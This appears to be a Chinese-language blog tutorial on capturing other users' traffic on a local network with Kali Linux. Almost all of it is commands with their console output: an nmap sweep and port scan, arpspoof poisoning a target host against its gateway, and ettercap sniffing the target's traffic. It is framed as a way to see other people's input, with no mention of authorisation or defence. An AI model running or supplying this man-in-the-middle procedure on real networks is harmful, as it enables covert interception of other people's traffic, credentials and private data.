Kali linux查看局域網內其他用戶的輸入信息

使用nmap 工具在局域網里進行偵探，查看局域網里ip存活數量

root@kali:~# nmap -sP 192.168.1.0/24

 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-09 20:59 EST

Nmap scan report for 192.168.1.1 (192.168.1.1)

Host is up (0.0026s latency).

MAC Address: EC:82:63:85:01:E0 (Unknown)

Nmap scan report for tl-wdr6300 (192.168.1.2)

Host is up (0.0039s latency).

MAC Address: BC:46:99:71:F2:E2 (Tp-link Technologies)

Nmap scan report for 192.168.1.3 (192.168.1.3)

Host is up (0.00016s latency).

MAC Address: B0:35:9F:09:70:8B (Intel Corporate)

Nmap scan report for hao-pc (192.168.1.6)

Host is up (0.00056s latency).

MAC Address: 00:0C:29:B8:63:5A (VMware)

Nmap scan report for 192.168.1.200 (192.168.1.200)

Host is up (0.00030s latency).

MAC Address: 00:0C:29:1C:FD:85 (VMware)

Nmap scan report for kali (192.168.1.5)

Host is up.

Nmap done: 256 IP addresses (6 hosts up) scanned in 2.00 seconds

掃描端口：

Nmap 192.168.1.6

進行arp欺騙：

在進行arp欺騙之前需要開啟ip轉發，沒有ip轉發目標機器就會無法上網。

root@kali:~# cat /proc/sys/net/ipv

ipv4/ ipv6/

root@kali:~# cat /proc/sys/net/ipv4/ip_forward

1

root@kali:~#

 

進行arp欺騙

root@kali:~# arpspoof -i

eth0  lo    

root@kali:~# arpspoof -i eth0 192.168.1.6 192.168.1.1

Version: 2.4

Usage: arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

root@kali:~# arpspoof -i eth0 -t 192.168.1.6 192.168.1.1

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c5:32:32

0:c:29:c5:32:32 0:c:29:b8:63:5a、

 

獲取靶機信息

root@kali:~# ettercap -Tq -i eth0

 

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team

 

Listening on:

  eth0 -> 00:0C:29:C5:32:32

  192.168.1.5/255.255.255.0

  fe80::20c:29ff:fec5:3232/64

 

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file

Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.

Privileges dropped to EUID 65534 EGID 65534...

 

  33 plugins

  42 protocol dissectors

  57 ports monitored

20388 mac vendor fingerprint

1766 tcp OS fingerprint

2182 known services

Lua: no scripts were specified, not starting up!

 

Randomizing 255 hosts for scanning...

Scanning the whole netmask for 255 hosts...

* |==================================================>| 100.00 %

 

6 hosts added to the hosts list...

Starting Unified sniffing...

 

 

Text only Interface activated...

Hit 'h' for inline help

 

隨着靶機查看信息得到反饋

獲取到的信息是所有的數據流量（就是有點多）